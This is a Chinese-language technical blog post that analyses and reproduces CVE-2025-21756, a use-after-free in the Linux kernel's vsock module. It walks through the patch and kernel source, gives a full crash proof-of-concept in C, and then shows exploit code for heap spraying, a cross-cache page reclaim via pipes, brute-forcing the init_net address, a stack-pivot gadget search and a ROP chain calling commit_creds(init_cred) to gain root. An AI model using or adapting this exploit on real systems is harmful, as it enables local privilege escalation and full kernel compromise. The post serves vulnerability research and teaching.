CVE-2025-21756 漏洞复现及利用

CVE-2025-21756 漏洞复现及利用

henry Lv4

CVE-2025-21756

https://nvd.nist.gov/vuln/detail/CVE-2025-21756 为漏洞相关描述信息,该漏洞位于 vsock 模块下,原因为transport(实际执行数据传输逻辑的后端实现接口集)在重新分配时解除绑定导致 UAF。本篇文章重点在于详细分析漏洞触发原因,漏洞利用部分参考exploit ,同时也会说明一下笔者在实际利用测试过程中遇到的一些问题。

Vsock

VSOCK(Virtual Socket) 是一种专为虚拟机(VM)与宿主机之间高效通信设计的套接字协议,由 VMware 最初提出并集成到 Linux 内核中。它允许虚拟机内的应用程序直接与宿主机或其他虚拟机通信,无需经过传统网络协议栈(如 TCP/IP),从而提供更低延迟和更高吞吐量。

VSOCK 的典型应用场景

(1) 宿主机-虚拟机通信

  • 示例:宿主机上的监控工具直接读取虚拟机内的日志。
  • 优势:无需配置虚拟网络(如桥接、NAT),避免网络带宽竞争。

(2) 虚拟机间通信

  • 示例:同一宿主机上的两个 Kubernetes Pod(运行在不同 VM 中)通过 VSOCK 交换数据。
  • 优势:比 overlay 网络(如 Flannel、Calico)更高效。

(3) 嵌套虚拟化

  • 在嵌套虚拟化环境中(如 VM 内再运行 VM),VSOCK 可跨多层虚拟化通信。

Patch

Linux kernel 对应的 commit 3f43540166128951cc1be7ab1ce6b7f05c670d8b

nipaste_2025-06-06_02-21-5

新增条件判断 SOCK_DEAD

  • 只有套接字标记为 SOCK_DEAD(表示已关闭或不可用)时,才从绑定表(vsock_bound_sockets)移除。

  • 避免在传输层切换(transport reassignment)时误删绑定。

保留 vsock_remove_connected(vsk)

  • 连接表(vsock_connected_sockets)的移除逻辑不变,因为连接状态与传输层无关。

sock_orphan 提前,目的是提前将sk状态设置为SOCK_DEAD

nipaste_2025-06-06_02-27-2

Basics

Struct info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/* Address structure for vSockets.   The address family should be set to
* AF_VSOCK. The structure members should all align on their natural
* boundaries without resorting to compiler packing directives. The total size
* of this structure should be exactly the same as that of struct sockaddr.
*/

struct sockaddr_vm {
__kernel_sa_family_t svm_family; // 地址族,必须设置为 AF_VSOCK
unsigned short svm_reserved1; // 保留字段,目前未使用
unsigned int svm_port; // 端口号
unsigned int svm_cid; // 上下文ID(Context ID)
__u8 svm_flags; // 标志位 每个 VM 保留一个 cid
unsigned char svm_zero[sizeof(struct sockaddr) -
sizeof(sa_family_t) -
sizeof(unsigned short) -
sizeof(unsigned int) -
sizeof(unsigned int) -
sizeof(__u8)]; // 填充字段,确保与 sockaddr 大小一致
};

#define IOCTL_VM_SOCKETS_GET_LOCAL_CID _IO(7, 0xb9)

Introduction

关于 vsock 的相关操作介绍内容如下

  • bind() 显式绑定:用户调用 bind() 时,套接字会被加入 vsock_bound_sockets 列表。
  • connect() 隐式绑定(autobind):如果未显式 bind()connect() 会自动绑定一个随机端口。

1. vsock_remove_bound(vsk)

作用

  • 移除套接字的绑定信息(从 vsock_bound_sockets 列表中删除)。
  • 通常在以下情况调用:
    • 套接字显式调用 bind() 后又被关闭(close())。
    • 套接字隐式绑定(autobind)后被释放。
1
2
3
4
5
6
7
void vsock_remove_bound(struct vsock_sock *vsk)
{
if (!list_empty(&vsk->bound_table)) {
list_del_init(&vsk->bound_table); // 从绑定列表移除
sock_put(&vsk->sk); // 减少引用计数(refcnt--)
}
}
  • list_del_init(&vsk->bound_table)
    如果 vskvsock_bound_sockets 列表(即已绑定),则移除它。
  • sock_put(&vsk->sk)
    减少套接字的引用计数(refcnt),如果 refcnt=0,则释放套接字。

使用场景

  • vsock 套接字关闭(release)或重新绑定(rebind)时调用。
  • 问题修复前
    如果 transport 重新赋值(如 connect() 时切换传输层),错误调用 vsock_remove_bound() 可能导致 UAF(因为 vsk 可能未真正绑定)。

2. vsock_remove_connected(vsk)

  • 移除套接字的连接信息(从 vsock_connected_sockets 列表中删除)。
  • 通常在以下情况调用:
    • 套接字已建立连接(connect()/accept())后被关闭。
    • 传输层(transport)释放时(如 virtio-vsock 断开连接)。
1
2
3
4
5
void vsock_remove_connected(struct vsock_sock *vsk)
{
list_del_init(&vsk->connected_table); // 从连接列表移除
sock_put(&vsk->sk); // 减少引用计数(refcnt--)
}
  • list_del_init(&vsk->connected_table)
    如果 vskvsock_connected_sockets 列表(即已连接),则移除它。
  • sock_put(&vsk->sk)
    减少引用计数,可能触发套接字释放。

这里具体说一下 vsk->bound_table 在实际进行绑定操作时,需要先通过vsk->local_addr计算出哈希值,然后存储到对应hash tablebucket 当中。

1
2
__vsock_remove_bound(vsk);
__vsock_insert_bound(vsock_bound_sockets(&vsk->local_addr), vsk);

相关宏定义如下,同时注释信息也详细解释了相关实现逻辑,不再过多说明

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Each bound VSocket is stored in the bind hash table and each connected
* VSocket is stored in the connected hash table.
*
* Unbound sockets are all put on the same list attached to the end of the hash
* table (vsock_unbound_sockets). Bound sockets are added to the hash table in
* the bucket that their local address hashes to (vsock_bound_sockets(addr)
* represents the list that addr hashes to).
*
* Specifically, we initialize the vsock_bind_table array to a size of
* VSOCK_HASH_SIZE + 1 so that vsock_bind_table[0] through
* vsock_bind_table[VSOCK_HASH_SIZE - 1] are for bound sockets and
* vsock_bind_table[VSOCK_HASH_SIZE] is for unbound sockets. The hash function
* mods with VSOCK_HASH_SIZE to ensure this.
*/
#define MAX_PORT_RETRIES 24

#define VSOCK_HASH(addr) ((addr)->svm_port % VSOCK_HASH_SIZE)
#define vsock_bound_sockets(addr) (&vsock_bind_table[VSOCK_HASH(addr)])
#define vsock_unbound_sockets (&vsock_bind_table[VSOCK_HASH_SIZE])

Func

这一部分主要包括一些漏洞相关的函数源码,供读者参考,大致浏览即可(后面遇到理解问题时可以在尝试仔细阅读)

vsock_create

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
static int vsock_create(struct net *net, struct socket *sock,
int protocol, int kern)
{
struct vsock_sock *vsk;
struct sock *sk;
int ret;

if (!sock)
return -EINVAL;

if (protocol && protocol != PF_VSOCK)
return -EPROTONOSUPPORT;

switch (sock->type) {
case SOCK_DGRAM:
sock->ops = &vsock_dgram_ops;
break;
case SOCK_STREAM:
sock->ops = &vsock_stream_ops;
break;
case SOCK_SEQPACKET:
sock->ops = &vsock_seqpacket_ops;
break;
default:
return -ESOCKTNOSUPPORT;
}

sock->state = SS_UNCONNECTED;

sk = __vsock_create(net, sock, NULL, GFP_KERNEL, 0, kern); //核心调用
if (!sk)
return -ENOMEM;

vsk = vsock_sk(sk);

if (sock->type == SOCK_DGRAM) {
ret = vsock_assign_transport(vsk, NULL);
if (ret < 0) {
sock_put(sk);
return ret;
}
}

vsock_insert_unbound(vsk);

return 0;
}

__vsock_create

完成当前 sk 的初始化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
static struct sock *__vsock_create(struct net *net,
struct socket *sock,
struct sock *parent,
gfp_t priority,
unsigned short type,
int kern)
{
struct sock *sk;
struct vsock_sock *psk;
struct vsock_sock *vsk;

sk = sk_alloc(net, AF_VSOCK, priority, &vsock_proto, kern);
if (!sk)
return NULL;

sock_init_data(sock, sk);

/* sk->sk_type is normally set in sock_init_data, but only if sock is
* non-NULL. We make sure that our sockets always have a type by
* setting it here if needed.
*/
if (!sock)
sk->sk_type = type;

vsk = vsock_sk(sk);
vsock_addr_init(&vsk->local_addr, VMADDR_CID_ANY, VMADDR_PORT_ANY);
vsock_addr_init(&vsk->remote_addr, VMADDR_CID_ANY, VMADDR_PORT_ANY);

sk->sk_destruct = vsock_sk_destruct;
sk->sk_backlog_rcv = vsock_queue_rcv_skb;
sock_reset_flag(sk, SOCK_DONE);

INIT_LIST_HEAD(&vsk->bound_table);
INIT_LIST_HEAD(&vsk->connected_table);
vsk->listener = NULL;
INIT_LIST_HEAD(&vsk->pending_links);
INIT_LIST_HEAD(&vsk->accept_queue);
vsk->rejected = false;
vsk->sent_request = false;
vsk->ignore_connecting_rst = false;
vsk->peer_shutdown = 0;
INIT_DELAYED_WORK(&vsk->connect_work, vsock_connect_timeout);
INIT_DELAYED_WORK(&vsk->pending_work, vsock_pending_work);

psk = parent ? vsock_sk(parent) : NULL;
if (parent) {
vsk->trusted = psk->trusted;
vsk->owner = get_cred(psk->owner);
vsk->connect_timeout = psk->connect_timeout;
vsk->buffer_size = psk->buffer_size;
vsk->buffer_min_size = psk->buffer_min_size;
vsk->buffer_max_size = psk->buffer_max_size;
security_sk_clone(parent, sk);
} else {
vsk->trusted = ns_capable_noaudit(&init_user_ns, CAP_NET_ADMIN);
vsk->owner = get_current_cred();
vsk->connect_timeout = VSOCK_DEFAULT_CONNECT_TIMEOUT;
vsk->buffer_size = VSOCK_DEFAULT_BUFFER_SIZE;
vsk->buffer_min_size = VSOCK_DEFAULT_BUFFER_MIN_SIZE;
vsk->buffer_max_size = VSOCK_DEFAULT_BUFFER_MAX_SIZE;
}

return sk;
}

vsock_bind

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static int __vsock_bind(struct sock *sk, struct sockaddr_vm *addr)
{
struct vsock_sock *vsk = vsock_sk(sk);
int retval;

/* First ensure this socket isn't already bound. */
if (vsock_addr_bound(&vsk->local_addr))
return -EINVAL;

/* Now bind to the provided address or select appropriate values if
* none are provided (VMADDR_CID_ANY and VMADDR_PORT_ANY). Note that
* like AF_INET prevents binding to a non-local IP address (in most
* cases), we only allow binding to a local CID.
*/
if (addr->svm_cid != VMADDR_CID_ANY && !vsock_find_cid(addr->svm_cid))
return -EADDRNOTAVAIL;

switch (sk->sk_socket->type) {
// 流式套接字
case SOCK_STREAM:
// 有序分组套接字
case SOCK_SEQPACKET:
spin_lock_bh(&vsock_table_lock);

// 调用 __vsock_bind_connectible 处理可连接套接字的绑定
retval = __vsock_bind_connectible(vsk, addr);
spin_unlock_bh(&vsock_table_lock);
break;

// 数据报套接字
case SOCK_DGRAM:
retval = __vsock_bind_dgram(vsk, addr);
break;

default:
retval = -EINVAL;
break;
}

return retval;
}

这个函数是 VSOCK (虚拟套接字) 的绑定操作实现,负责将一个 VSOCK 套接字绑定到指定的地址

__vsock_bind_connectible

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
static int __vsock_bind_connectible(struct vsock_sock *vsk,
struct sockaddr_vm *addr)
{
static u32 port;
struct sockaddr_vm new_addr;

if (!port)
port = get_random_u32_above(LAST_RESERVED_PORT); //分配一个大于 LAST_RESERVED_PORT 的端口号
// new_addr = addr
vsock_addr_init(&new_addr, addr->svm_cid, addr->svm_port);
// 如果指定的端口为 `VMADDR_PORT_ANY` 则采取自动分配
if (addr->svm_port == VMADDR_PORT_ANY) {
bool found = false;
unsigned int i;

for (i = 0; i < MAX_PORT_RETRIES; i++) {
if (port <= LAST_RESERVED_PORT)
port = LAST_RESERVED_PORT + 1;
// 每次尝试递增端口号,并检查是否已被占用
new_addr.svm_port = port++;
// 在 bound list 中查找与指定地址匹配的套接字
if (!__vsock_find_bound_socket(&new_addr)) {
found = true;
break;
}
}
// 如果找不到可用端口,返回地址不可用错误
if (!found)
return -EADDRNOTAVAIL;
} else {
/* If port is in reserved range, ensure caller
* has necessary privileges.
*/
// 绑定特权端口(≤ LAST_RESERVED_PORT)需要 CAP_NET_BIND_SERVICE 能力
if (addr->svm_port <= LAST_RESERVED_PORT &&
!capable(CAP_NET_BIND_SERVICE)) {
return -EACCES;
}

if (__vsock_find_bound_socket(&new_addr))
return -EADDRINUSE;
}

vsock_addr_init(&vsk->local_addr, new_addr.svm_cid, new_addr.svm_port);

/* Remove connection oriented sockets from the unbound list and add them
* to the hash table for easy lookup by its address. The unbound list
* is simply an extra entry at the end of the hash table, a trick used
* by AF_UNIX.
*/
// 从未绑定列表中移除
__vsock_remove_bound(vsk);
// 插入到绑定哈希表的相应位置
// list_add(&vsk->bound_table, list);
__vsock_insert_bound(vsock_bound_sockets(&vsk->local_addr), vsk);

return 0;
}

vsk->transport

VSOCK 是一个统一的地址族(AF_VSOCK),用于虚拟机(Guest)与宿主机(Host)之间通信,但不同虚拟化平台提供的数据通道是不同的:

平台 底层机制 内核 transport 实现
VMware VMCI(虚拟机通信接口) vmci_transport
KVM / QEMU Virtio virtio_transport
Hyper-V VMBus hv_transport

为了支持这些不同平台而不让上层逻辑乱套,VSOCK 设计了一个 vsock_transport 接口结构体来“封装差异”。

vsk->transportvsock_sock 结构体中的一个指针,指向 VSOCK 协议中用于实际执行数据传输逻辑的后端实现接口集,是 VSOCK 子系统中的一个关键抽象

1
2
3
4
5
6
7
8
struct vsock_transport {
int (*bind)(struct vsock_sock *vsk, struct sockaddr_vm *addr);
int (*connect)(struct vsock_sock *vsk);
int (*release)(struct vsock_sock *vsk);
ssize_t (*send_pkt)(struct vsock_sock *vsk, struct sk_buff *skb);
ssize_t (*recv_stream)(struct vsock_sock *vsk, struct msghdr *msg, size_t len, int flags);
...
};

sock & vsock

(1) struct sock (通用套接字层)

  • 定义位置include/net/sock.h
  • 作用:表示一个通用的网络套接字,是所有协议族(如 INET、UNIX、VSOCK 等)套接字的基类
  • 包含字段
    • 协议无关的通用状态(如引用计数 sk_refcnt
    • 套接字队列(接收/发送缓冲区)
    • 操作函数表(struct proto_ops *sk_prot_ops
    • 网络命名空间指针等

(2) struct vsock_sock (VSOCK专用层)

  • 定义位置net/vmw_vsock/af_vsock.h

  • 作用:VSOCK 协议族的扩展数据结构,继承自 sock 并添加 VSOCK 特有的属性和方法。

  • 关键字段

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    struct vsock_sock {
    struct sock sk; // 内嵌的通用sock结构
    struct sockaddr_vm local_addr; // 本地CID+端口
    struct sockaddr_vm remote_addr; // 远程CID+端口
    // VSOCK特有状态(如传输层接口、流控制等)
    const struct vsock_transport *transport;
    u32 buf_size;
    u32 buf_alloc;
    // ...
    };

vsock close(s) call chain

在对 vsock 套接字调用 close(s) 时,相关触发逻辑如下:

1
2
3
4
5
6
7
8
__vsock_release(struct sock *sk, int level)
↳ vsock_release(struct socket *sock)
↳ __sock_release()
↳ sock_close()
↳ __fput()
↳ fput()
↳ filp_close()
↳ sys_close(fd)

POC

Link: https://hoefler.dev/articles/attachments/crash.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <linux/kernel.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

#define MAX_PORT_RETRIES 24 /* net/vmw_vsock/af_vsock.c */
#define VMADDR_CID_NONEXISTING 42

#define pause() {write(STDOUT_FILENO, "[*] Paused (press enter to continue)\n", 37); getchar();}

/* Create socket <type>, bind to <cid, port> and return the file descriptor. */
int vsock_bind(unsigned int cid, unsigned int port, int type)
{
struct sockaddr_vm sa = {
.svm_family = AF_VSOCK,
.svm_cid = cid,
.svm_port = port,
};
int fd;

fd = socket(AF_VSOCK, type, 0);
if (fd < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

if (bind(fd, (struct sockaddr *)&sa, sizeof(sa))) {
perror("bind");
exit(EXIT_FAILURE);
}

return fd;
}

/* Test attempts to trigger a transport release for an unbound socket. This can
* lead to a reference count mishandling.
*/

int main(void) {

int sockets[MAX_PORT_RETRIES];
struct sockaddr_vm addr;
int s, i, alen;

// execute vsock_create & vsock_bind in kernel
s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

alen = sizeof(addr);
if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
perror("getsockname");
exit(EXIT_FAILURE);
}

// 循环绑定多个套接字,递增端口号(++addr.svm_port),目的是 耗尽可用端口,使后续 connect() 失败
for (i = 0; i < MAX_PORT_RETRIES; ++i) {
sockets[i] = vsock_bind(VMADDR_CID_ANY, ++addr.svm_port,
SOCK_SEQPACKET);
printf("[+] sockets[%d] == %d\n", i, sockets[i]);
}

// 关闭初始套接字,重新创建一个新的 VSOCK 套接字
close(s);

// wait for input
puts("Setup Finished...");
getchar();

s = socket(AF_VSOCK, SOCK_STREAM, 0);
if (s < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

puts("[*] First connect over!");
addr.svm_cid = VMADDR_CID_NONEXISTING; // switch transport
addr.svm_port = VMADDR_PORT_ANY; // dont need
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

// wait for input
puts("Press for Crash...");
getchar();

// Vulnerable system may crash now. [USE THE DANGLING POINTER]
bind(s, (struct sockaddr *)&addr, alen);

// wait for input
getchar();

close(s);
while (i--)
close(sockets[i]);

}

Vulnerability

Setup ENV

1
2
3
4
5
6
7
8
9
10
11
12
13
s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

alen = sizeof(addr);
if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
perror("getsockname");
exit(EXIT_FAILURE);
}

for (i = 0; i < MAX_PORT_RETRIES; ++i)
sockets[i] = vsock_bind(VMADDR_CID_ANY, ++addr.svm_port,
SOCK_SEQPACKET);

close(s);

这一步主要用于初始化漏洞利用环境(可以参考前面部分__vsock_bind_connectible的相关实现逻辑),主要是先通过vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET); 创建并绑定一个vsock 套接字到s,这一步实际是用来得到addr.svm_port,在后续for循环中将会在该端口值的基础上递增,用来将最大允许的 MAX_PORT_RETRIES 端口数量消耗完,这一步将会导致后续绑定一个新的vsock 套接字后,调用 connect 找不到可用端口,返回错误,从而触发漏洞相关逻辑。

**STEP.1 **

vsock_create() (refcnt=1) calls vsock_insert_unbound() (refcnt=2)

1
2
// vsock_bind wrapped by func `socket` & `bind` in userspace
s = socket(AF_VSOCK, SOCK_STREAM, 0);

nipaste_2025-06-06_00-16-3

STEP.2

transport->release() calls vsock_remove_bound() without checking if sk was bound and moved to bound list (refcnt=1)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*---------First connect----------*/
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

/*---------Second connect----------*/
addr.svm_cid = VMADDR_CID_NONEXISTING;
addr.svm_port = VMADDR_PORT_ANY;
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

第一次 connect 触发执行路径如下所示:

nipaste_2025-06-06_03-02-2

此时,由于vsock_auto_bind返回失败,vsk仍然还在unbound list当中,需要强调的是vsock_auto_bind会失败是因为前面一开始,就通过耗尽VMADDR_CID_ANY对应cid下所有的有效端口数量,从而使得返回-EADDRNOTAVAIL,相关代码逻辑如下:

nipaste_2025-06-06_03-09-0

内核调试验证如下所示:

nipaste_2025-06-06_03-03-0

关于这一步connect的作用在后续分析第二次connect时会有提到。

第二次 connect 触发执行路径如下所示:

nipaste_2025-06-06_03-28-1

再来关注下vsock_assign_transport 这个函数,该函数实际就是触发 UAF 的所在函数,内容如下:

nipaste_2025-06-06_04-09-2

在执行transport->release 之后,vsock_deassign_transport 将会把 transport 置为空

为方便理解,这里用实际调试时的场景进行解释:

nipaste_2025-06-06_03-53-1

在第一次 connect 时,由于此时 vsk->transport 还未初始化,因此该值为 0,如上图所示,但在函数后面会将vsk->transport 初始化为 new_transport,即loopback_transport,因为第一次执行connectaddr.svm_cidVMADDR_CID_LOCAL(对应内核中的remote_cid),此时transport将会被设置为transport_local(对应为loopback_transport),这也是为什么前面需要一次connect操作。

nipaste_2025-06-06_03-54-2

在执行第二次connect时,此时 vsk->transportnew_transport内容分别如上图所示,此时会调用 vsk->transport->release(vsk),而该函数指针实际调用为virtio_transport_release

nipaste_2025-06-06_04-17-1

在该函数内部会调用virtio_transport_remove_sock,内容如下:

nipaste_2025-06-06_04-18-3

因而使得这里的有效引用位减一。

STEP.3

注意这里的 vsock_auto_bind 还会进行一次释放

nipaste_2025-06-06_04-46-5

最终会触发执行

nipaste_2025-06-06_04-48-3

相较于第一次connect失败,第二次connect可以正常进行 bind 操作,是因为第二次connect时,通过 Step.2 可知transport->release会将vsk 状态重置,如下图所示,此时在函数__vsock_bind_connectible调用__vsock_find_bound_socket会返回 NULL(VSOCK地址未被vsk占用),会正常完成绑定操作。

Snipaste_2025-06-12_19-15-44

内核调试验证如下,此时由于refcnt = 0 会进入到__sk_free(sk) ,会使得该堆块被释放,从而在进入到__vsock_insert_bound 时会触发 UAF。

nipaste_2025-06-06_02-19-3

Crash 如下:

nipaste_2025-06-06_04-56-2

Exploit

这一部分原文 说的也比较详细,这里主要说一些笔者角度的理解。

Step.1 Spray vsock heap object and alloc target vsock for uaf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
   puts("[+] pre alloc sockets");

int pre[PRE];
for (int i = 0; i < PRE; i++)
pre[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

puts("[+] alloc target");
s = socket(AF_VSOCK, SOCK_STREAM, 0);
if (s < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

// testing
puts("[+] post-alloc objects");
int post[POST];
for (int i = 0; i < POST; i++)
post[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);


puts("[+] trigger uaf");
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

addr.svm_cid = VMADDR_CID_NONEXISTING;
addr.svm_port = VMADDR_PORT_ANY;
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

因为在实际测试过程中发现这里 vsock套接字的分配来自独立缓存,如下图所示,所以需要借助 Cross Cache Attack 完成利用,这一步主要就是堆喷相关结构体,然后触发目标vuln_vsk UAF。

Snipaste_2025-06-12_13-35-37

Step.2 Release target slab back to buddy system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
puts("[+] uaf finished!..");


puts("[+] fill up the cpu partial list");
for (int i = 4; i < FLUSH; i += OBJS_PER_SLAB)
close(junk[i]);

puts("[+] free all the pre/post alloc-ed objects");
for (int i = 0; i < POST; i++)
close(post[i]);
for (int i = 0; i < PRE; i++)
close(pre[i]);

puts("[+] close the junk bound sockets");
for (int i = 0; i < FLUSH; i++)
close(junk[i]);

sleep(3);

这一步主要是将vuln_vsk所在的vuln_slab释放回伙伴系统,用于后面PageHijack(通过pipe_buffer来进行实现)。

Step.3 Hijack vuln_slab and detect whether hits target slab by brute force

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
int pipes[NUM_PIPES][2];
char page[PAGE_SIZE];
memset(page, 2, PAGE_SIZE);

puts("[+] reclaim page");
pause();

int w = 0;
int j;
i = 0;
while (1) { // TODO: i < NUM_PIPES, improve stability

sleep(0.1);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
break;
}

w = 0;
while (w < PAGE_SIZE) {
ssize_t written = write(pipes[i][1], page, 8);
j = query_vsock_diag();
w += written;
if (j != 48) goto out;
}
printf(".");
fflush(stdout);
i++;
if (i % 32 == 0) puts("");
}

可以看到这里采用了一个稍微比较巧妙的方式来判断vuln_vsk是否被损坏,即通过每次写write 8字节的方式,然后调用query_vsock_diag是否执行成功判断是否命中成功。query_vsock_diag最终会调用到vsock_diag_dump 函数中,该函数中有两个检查,具体如下:

Snipaste_2025-06-12_14-17-51

其中第二个检查比较好绕过,设置对应的sk->sk_state 为2即可,sock_net 对应sk偏移为0x30的位置,因此如果该位置出现损坏,将会读取失败(最终反应在 len 字段上面),从下图可以看到比较的对象是init_net,该值为0xffffffff84bb1f80,因此为了绕过这个判断,我们需要对init_net的地址进行爆破(Step.4)。

Snipaste_2025-06-12_14-08-23

Step.4 Brute force the address of init_net

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
long base = 0xffffffff84bb1000; // probably need to change for aslr
long off = 0;
long addy;
printf("[+] attempting net overwrite (aslr bypass).\n");

while (off < 0xffffffff) {

// release the page of vsk
close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
}

addy = base + off;

write(pipes[i][1], page, w - 8);
write(pipes[i][1], &addy, 8); //position of sock_net(sk)

if (off % 256 == 0) {
printf("+");
fflush(stdout);
}

j = query_vsock_diag();
if (j == 48) {
printf("\n[*] LEAK init_net @ 0x%lx\n", base + off);
goto out2;
}

off += 128; // TODO: modify for aslr?

}

这里先是估计了一个init_net的基地址0xffffffff84bb1000,然后从这个基地址开始爆破,爆破的思路是只要发现在写入新的init_net值后,不能通过vsock_diag_dump的判断就重新释放vuln_slab,然后重新获取该slab在尝试进行写。

在实际利用过程中,这种重复释放page并进行回收写,每次都成功命中的概率是很低的。但是由于测试的文件系统环境比较干净,使得该 POC 在这样的情况下利用成功率还不错,这一点是需要注意的。

同时,这里猜的地址实际上是没有开随机化时的值,所以实际情况下要爆破出该地址更是难上加难。

Step.5 Hijack control flow and Construct ROP

由于我们已经劫持了vuln_vsk所在的 page,所以vuln_vsk 结构体的内容由我们可控,与其他劫持控制流的思路一样,vsk 中也有一些函数指针的调用,这里劫持的思路是通过vsock_release 实现控制流劫持。

Snipaste_2025-06-12_14-39-53

sk->sk_prot->close 是一个二级虚表函数指针调用,这意味着可以通过伪造sk_prot指向一个拥有函数指针的结构体实现任意函数调用,这里选取的对象是raw_prot,该对象存在一个函数指针调用为raw_abort,函数内容如下:

Snipaste_2025-06-12_15-06-41

如下图所示,因此可以通过伪造sk->sk_err_report 字段来实现控制流劫持的目的。

Snipaste_2025-06-12_15-07-45

由于 sk 结构体内容可控,所以控制流劫持第一步当然是栈迁移,经过调试后发现在执行到sk_err_report时,寄存器rbxrdi都指向vuln_vsk的堆地址,所以只要找类似push rbx ; pop rsp ; ret 或者push rdi ; pop rsp ; ret 类似的 gadget 就可以了,但是实际上内核中品相这么好用的 gadget 很少(几乎没有),通过ropperROPgadget 都没有找到。

这里提一下笔者找栈迁移 gadget 的思路,由于前面两种常见找gadget方式都没找到,所以采用了一种比较原始的方式,即扫描内核kernel code段匹配对应push rbx ; pop rsp ;的字节码 0x535C ,然后在找到的结果(总共68处)中在人工筛选满足条件的能够完成实际栈迁移的gadget

Snipaste_2025-06-12_15-26-18

最终锁定如下图所示的一处 gadget,由于中间有个jb跳转,所以在实际测试过程中可能因为满足跳转条件而不走后面 ret,怀着忐忑的心情在测试后,发现可以成功执行到ret 完成栈迁移,至此就可以布置 ROP 链完成提权。

Snipaste_2025-06-12_15-28-05

详细 ROP 链如下;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// create the rop chain!
long deadbuf = 0;
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);

write(pipes[i][1], &pop_r15_ret, 8); // junk
write(pipes[i][1], &raw_proto_abort, 8); // sk_prot (calls sk->sk_error_report())
write(pipes[i][1], &ret, 8);

// totoally add 0x18 data so dont need `write(pipes[i][1], buf, 0x18);`
write(pipes[i][1], &pop_rdi_ret, 8); // stack pivot target
write(pipes[i][1], &init_cred, 8);
write(pipes[i][1], &ret, 8);
// write(pipes[i][1], &ret, 8);

write(pipes[i][1], &commit_creds, 8); // commit_creds(init_cred);
write(pipes[i][1], &swapgs_restore_regs_and_return_to_usermode, 8);
write(pipes[i][1], &null_ptr, 8); // rax
write(pipes[i][1], &null_ptr, 8); // rdi
write(pipes[i][1], &shell, 8); // rip
write(pipes[i][1], &user_cs, 8);
write(pipes[i][1], &user_rflags, 8);
write(pipes[i][1], &user_rsp, 8); // rsp
write(pipes[i][1], &user_ss, 8);
// write(pipes[i][1], buf, 0x18);
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
